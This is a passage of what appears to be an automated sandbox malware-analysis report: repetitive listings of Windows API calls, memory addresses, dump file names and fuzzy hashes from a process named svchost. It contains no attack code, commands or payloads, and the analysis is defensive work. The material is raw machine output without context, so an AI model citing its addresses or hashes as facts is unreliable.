                                                            • OleInitialize.OLE32(00000000), ref: 0084AC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0084AC66
                                                            • SHGetMalloc.SHELL32(00878438), ref: 0084AC70
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: be69507eb425df85f1eb72af3f6e419e5f036f3788d8c07c963972a394a5b9f7
                                                            • Instruction ID: 52a695aaed146955b4c92079d32c587765dc87623749281b9ee73cba6e194479
                                                            • Opcode Fuzzy Hash: be69507eb425df85f1eb72af3f6e419e5f036f3788d8c07c963972a394a5b9f7
                                                            • Instruction Fuzzy Hash: 4CF0F9B5900209ABCB10AFA9D9499AFFBFCFF84701F04415AA415E2251DBB856058FA1

                                                            Control-flow Graph (graph image not extracted)
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00839795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008397AD
                                                            • GetLastError.KERNEL32 ref: 008397DF
                                                            • GetLastError.KERNEL32 ref: 008397FE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: f3dc5fa471fdc713d0c93f4860640d3e46a2fd4879f949dad7cc42766c05d41f
                                                            • Instruction ID: ba294cdd1e0051535b8babe98b5c9eaf12f4543e74b5eda905cd8358d536d825
                                                            • Opcode Fuzzy Hash: f3dc5fa471fdc713d0c93f4860640d3e46a2fd4879f949dad7cc42766c05d41f
                                                            • Instruction Fuzzy Hash: 62116131924608EBDF205F65C804A6A37A9FBC2365F108939F496C52D0E7F4DE44DBE2

                                                            Control-flow Graph (graph image not extracted)
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0083D710,00000000,00000000,?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue), ref: 0085AD66
                                                            • GetLastError.KERNEL32(?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue,00867970,FlsSetValue,00000000,00000364,?,008598B7), ref: 0085AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue,00867970,FlsSetValue,00000000), ref: 0085AD80
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 1be95383643826e09a1d6d4e6d09aabd3f8c9c2fa823e0eec782cc33cbdcbc4f
                                                            • Instruction ID: 0fb9ea50627236f7b1a447a65516cec72706608f5579f2c77ba5441ab4375e44
                                                            • Opcode Fuzzy Hash: 1be95383643826e09a1d6d4e6d09aabd3f8c9c2fa823e0eec782cc33cbdcbc4f
                                                            • Instruction Fuzzy Hash: 5C012B36611236AFC7256F68EC84A577BB8FF057A3B160720FD06D7650D721D809C6E1
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0083D343,00000001,?,?,?,00000000,0084551D,?,?,?), ref: 00839F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0084551D,?,?,?,?,?,00844FC7,?), ref: 00839FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0083D343,00000001,?,?), ref: 0083A011
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: 49a6c4fac9f4920b92d8cd91ed5f132f2a74d06cf36dc6c69e5ee225ea1d00d4
                                                            • Instruction ID: 321471b0ee8295c1cb0508c397cc0677920d4986bfdc213c48e4c4172675b8e3
                                                            • Opcode Fuzzy Hash: 49a6c4fac9f4920b92d8cd91ed5f132f2a74d06cf36dc6c69e5ee225ea1d00d4
                                                            • Instruction Fuzzy Hash: B3317C31208749EFDB18CF24D818B6AB7A5FBC4715F044919F981DB290CBB5AD48CBE2
                                                            APIs
                                                              • Part of subcall function 0083C27E: _wcslen.LIBCMT ref: 0083C284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A30C
                                                            • GetLastError.KERNEL32(?,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A329
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: caa0e238f6f15520155dc378ccdf6f90509251fed9fff3c0f512a9c9497dba57
                                                            • Instruction ID: a4e3cabddd68446da2ec55559637e47785865097e7932fe73b0b2188d4b02649
                                                            • Opcode Fuzzy Hash: caa0e238f6f15520155dc378ccdf6f90509251fed9fff3c0f512a9c9497dba57
                                                            • Instruction Fuzzy Hash: 0001FC31500214AAEF29AB758C49FFE3348FF89780F044414F981E6181D754CA81C6F7
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0085B8B8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: b212676ea4e2b584d1856ee653e056a79d9e7f9f01dbd8dad0cb42f5cc266e73
                                                            • Instruction ID: ac5216a07e9e10e7ba817738625e9865c153c1303711607d87fe31269968627e
                                                            • Opcode Fuzzy Hash: b212676ea4e2b584d1856ee653e056a79d9e7f9f01dbd8dad0cb42f5cc266e73
                                                            • Instruction Fuzzy Hash: D341FC7050439C9EDB228E18CC84BF6BFA9FB55305F1404EDD999C6142E3359A49CF61
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0085AFDD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 89da91a9a14e992d580a0e26a1052f75586a95150615706b631581ebee14220f
                                                            • Instruction ID: d7ea0388b9d9706f222644bc11b5d306e7e0174d52526ba7ffe64dab771d62df
                                                            • Opcode Fuzzy Hash: 89da91a9a14e992d580a0e26a1052f75586a95150615706b631581ebee14220f
                                                            • Instruction Fuzzy Hash: 8D010C3250410DBBCF169F94DC06EEE7FA2FF08755F024254FE14A5260CA768931EB91
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0085A56F), ref: 0085AF55
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: b896ce047746ea9a4156b8edfca00125b365e66e48234d5c9a1f589f66ebdd61
                                                            • Instruction ID: 0349f70aa044a2e9c63ee74fb0b7133dacfcc03758e1ed89ae8b8155400dcc2f
                                                            • Opcode Fuzzy Hash: b896ce047746ea9a4156b8edfca00125b365e66e48234d5c9a1f589f66ebdd61
                                                            • Instruction Fuzzy Hash: 56F0B43164520CBFCB165F54CC02C9D7FA1FF05B12B024158FD18EA360DA755E1097C6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 1cde08be7ea9daba1a21ded5f15a336e9b529aba6ea2b1e2e7c62bc64b1e86bb
                                                            • Instruction ID: 295fe65534be2237467d469c908f74444a00a55ec4f10276cf73458160b53505
                                                            • Opcode Fuzzy Hash: 1cde08be7ea9daba1a21ded5f15a336e9b529aba6ea2b1e2e7c62bc64b1e86bb
                                                            • Instruction Fuzzy Hash: 00E0E531645218BBC715AB69DC0296EBFA5FB15722B020299FD15E7340CDB85E0086D6
                                                            APIs
                                                              • Part of subcall function 0085B7BB: GetOEMCP.KERNEL32(00000000,?,?,0085BA44,?), ref: 0085B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0085BA89,?,00000000), ref: 0085BC64
                                                            • GetCPInfo.KERNEL32(00000000,0085BA89,?,?,?,0085BA89,?,00000000), ref: 0085BC77
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 98bfd0b6c5bda37c2d75271b01d4a06127a75340d434687f776f5521e41d2f99
                                                            • Instruction ID: 46cdac1cdf15a03126e9dd13105c8a344123fa13894252c0fa7cc45b84ebbf1f
                                                            • Opcode Fuzzy Hash: 98bfd0b6c5bda37c2d75271b01d4a06127a75340d434687f776f5521e41d2f99
                                                            • Instruction Fuzzy Hash: 68513674A002499FDB208F75C8816BABBF5FF61306F1844AED896CB252D735994DCB90
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00839A50,?,?,00000000,?,?,00838CBC,?), ref: 00839BAB
                                                            • GetLastError.KERNEL32(?,00000000,00838411,-00009570,00000000,000007F3), ref: 00839BB6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 61b18bb24ab3d0f8eca52d21f509f43542ce0350b2c9ff4972c023361409ba15
                                                            • Instruction ID: a701831cac4234ecaa6f66309d54a74f37a1a5c9d186a335c23b8fe740a1b918
                                                            • Opcode Fuzzy Hash: 61b18bb24ab3d0f8eca52d21f509f43542ce0350b2c9ff4972c023361409ba15
                                                            • Instruction Fuzzy Hash: F9419B316043258FDB24DF29E58486AF7E6FBD4320F158A2DE8C1C3260D7F4AD448AD2
                                                            APIs
                                                              • Part of subcall function 008597E5: GetLastError.KERNEL32(?,00871030,00854674,00871030,?,?,00853F73,00000050,?,00871030,00000200), ref: 008597E9
                                                              • Part of subcall function 008597E5: _free.LIBCMT ref: 0085981C
                                                              • Part of subcall function 008597E5: SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 0085985D
                                                              • Part of subcall function 008597E5: _abort.LIBCMT ref: 00859863
                                                              • Part of subcall function 0085BB4E: _abort.LIBCMT ref: 0085BB80
                                                              • Part of subcall function 0085BB4E: _free.LIBCMT ref: 0085BBB4
                                                              • Part of subcall function 0085B7BB: GetOEMCP.KERNEL32(00000000,?,?,0085BA44,?), ref: 0085B7E6
                                                            • _free.LIBCMT ref: 0085BA9F
                                                            • _free.LIBCMT ref: 0085BAD5
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: 5dbc95175f521c1c643aec206c8256f8fd732fb90921ea761f745f642d1edfb6
                                                            • Instruction ID: 06e108cab496420912df27d2be0e4df986e06453a3aaed3e72dc10a6872cdc37
                                                            • Opcode Fuzzy Hash: 5dbc95175f521c1c643aec206c8256f8fd732fb90921ea761f745f642d1edfb6
                                                            • Instruction Fuzzy Hash: 9F31C431904219AFDB11DFA8D441B9D77F5FF50322F21409AED04DB2A2EB725D48DB51
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00831E55
                                                              • Part of subcall function 00833BBA: __EH_prolog.LIBCMT ref: 00833BBF
                                                            • _wcslen.LIBCMT ref: 00831EFD
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 955074452486dc1a99e104cc68b14fb017bac8071f92235a7ae6be7366e62ed7
                                                            • Instruction ID: 4854b1775ed2858a5b453a00e1b0d0d8b9ab41fbfdd700ad48f779c5693343f9
                                                            • Opcode Fuzzy Hash: 955074452486dc1a99e104cc68b14fb017bac8071f92235a7ae6be7366e62ed7
                                                            • Instruction Fuzzy Hash: EF314871904209AFCF11DF98C949AEEBBF6FF88710F1004AAE845E7251CB325E55CBA1
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008373BC,?,?,?,00000000), ref: 00839DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00839E70
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 2c23233728b8f3b6ca709fdc0f4d13c1179a3e2049430b812b01b75381b83387
                                                            • Instruction ID: 2aad2a8c6877dd025f742080ca9fedd2940963e4f44afa1de5ac15d8d7833e08
                                                            • Opcode Fuzzy Hash: 2c23233728b8f3b6ca709fdc0f4d13c1179a3e2049430b812b01b75381b83387
                                                            • Instruction Fuzzy Hash: 2D21D231248246EBC714DF75C896AABBBE8FF95304F08491CF4C5C7141D3A9D90C9BA2
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00839F27,?,?,0083771A), ref: 008396E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00839F27,?,?,0083771A), ref: 00839716
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 19312363d7531e652cd028ecbc079f0f9315059b8b5a83e28d7d56025023f98d
                                                            • Instruction ID: 53a7f74f58aa8a7f7bd3c34de4b1e671bc5eee34e06282d3dcf45acdcaebe9d2
                                                            • Opcode Fuzzy Hash: 19312363d7531e652cd028ecbc079f0f9315059b8b5a83e28d7d56025023f98d
                                                            • Instruction Fuzzy Hash: 9E21C4715047446FE3708A69CC8ABA7B7DCFB99324F100A19FAD5C21D1D7B4A84486B2
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00839EC7
                                                            • GetLastError.KERNEL32 ref: 00839ED4
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 44a1d27d2d5a5d43beb2b47f63f01f8d1cba1fe8d2e4857c6e6c32789f27a429
                                                            • Instruction ID: ef868fdda042ac1e02a25e765382a7000a69319c21e2c13cbd3e482f5f78bc08
                                                            • Opcode Fuzzy Hash: 44a1d27d2d5a5d43beb2b47f63f01f8d1cba1fe8d2e4857c6e6c32789f27a429
                                                            • Instruction Fuzzy Hash: 7C11E531600704ABD724C66CC845BA6B7E8FB84370F504A29E193D26D0D7F0ED49C7A0
                                                            APIs
                                                            • _free.LIBCMT ref: 00858E75
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00871098,008317CE,?,?,00000007,?,?,?,008313D6,?,00000000), ref: 00858EB1
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: 61ca34cffda4ed79cdd614841e15f128caf8441d4ed625d48d3aa27d840461c4
                                                            • Instruction ID: 025b4a17c1fa0c125de03f5dc52923dfbad29ba5648b4bf21d6448f489e62f12
                                                            • Opcode Fuzzy Hash: 61ca34cffda4ed79cdd614841e15f128caf8441d4ed625d48d3aa27d840461c4
                                                            • Instruction Fuzzy Hash: F4F0C232201115E6CB212A6AAC07B6F3779FF81B73B644127FC18F6191DF609D0885A1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 008410AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 008410B2
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 41bf1dde24e40e26145350519a3057697dcfa1132abb8f260d3a9172e45bc5a0
                                                            • Instruction ID: 77a3fe750d0d5207a77659c4b2bf3755b7df62594675a5d1c83a766b7dc57dc3
                                                            • Opcode Fuzzy Hash: 41bf1dde24e40e26145350519a3057697dcfa1132abb8f260d3a9172e45bc5a0
                                                            • Instruction Fuzzy Hash: 9FE0DF72F0094DA7CF0D8BB49C099EB73EDFA442047208179E403E3101FA70EE854AA0
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 0a8a7761cd96aacae96ae9979db68788bc74f57c1b421b60a0e7efd023e675dc
                                                            • Instruction ID: b331cf9c5cddfd1b2c5818be16b748ff5c88030777f25a031d9a604f0e736500
                                                            • Opcode Fuzzy Hash: 0a8a7761cd96aacae96ae9979db68788bc74f57c1b421b60a0e7efd023e675dc
                                                            • Instruction Fuzzy Hash: 15F0A932210209BBDF025FA0DC41FDA376CFB04385F488060B988E61A0DB71CA98EBA1
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641,000000FF), ref: 0083A1F1
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0083977F,?,?,008395CF,?,?,?,?,?,00862641), ref: 0083A21F
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: e52a1aeeb04d8a3fd0a7d84a79679d426e2e8f3a23141b92cca81921453ac3da
                                                            • Instruction ID: dfda61303ba8573d573a1e927a952b2feba4c0452cb9b67aaf35717f563b5b7f
                                                            • Opcode Fuzzy Hash: e52a1aeeb04d8a3fd0a7d84a79679d426e2e8f3a23141b92cca81921453ac3da
                                                            • Instruction Fuzzy Hash: 2CE092311402196BDB015F64DC46FDA775CFB08381F484021B944E2050EB61DE88DAA2
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00862641,000000FF), ref: 0084ACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00862641,000000FF), ref: 0084ACB5
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: 5070e6c528f095caab76dde86da40c6e1e93af437ad5d35ba9b638ea40831fcb
                                                            • Instruction ID: 7f835974e32f8c72a1ae4e3a6c2505e3b4d793e11b634537bf4a2acf516d79a2
                                                            • Opcode Fuzzy Hash: 5070e6c528f095caab76dde86da40c6e1e93af437ad5d35ba9b638ea40831fcb
                                                            • Instruction Fuzzy Hash: 13E06572544650EFC7009B5CDC06B45FBA9FB48B20F044266F416D3760CB74A840CB94
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,0083A23A,?,0083755C,?,?,?,?), ref: 0083A254
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0083A23A,?,0083755C,?,?,?,?), ref: 0083A280
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 767bd13ca05bc71f4ead6b9c274942fa6752f95681fa5206f482e5f71cd1f31d
                                                            • Instruction ID: b7d21edc224a7051ef33ee9981cce19ca0ebfedcbd05c3d6f7c9f97e698780df
                                                            • Opcode Fuzzy Hash: 767bd13ca05bc71f4ead6b9c274942fa6752f95681fa5206f482e5f71cd1f31d
                                                            • Instruction Fuzzy Hash: 6AE092319001285BCB11AB68CC05BD9B75CFB183E1F044261FE84E3190D770DE44CAE1
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0084DEEC
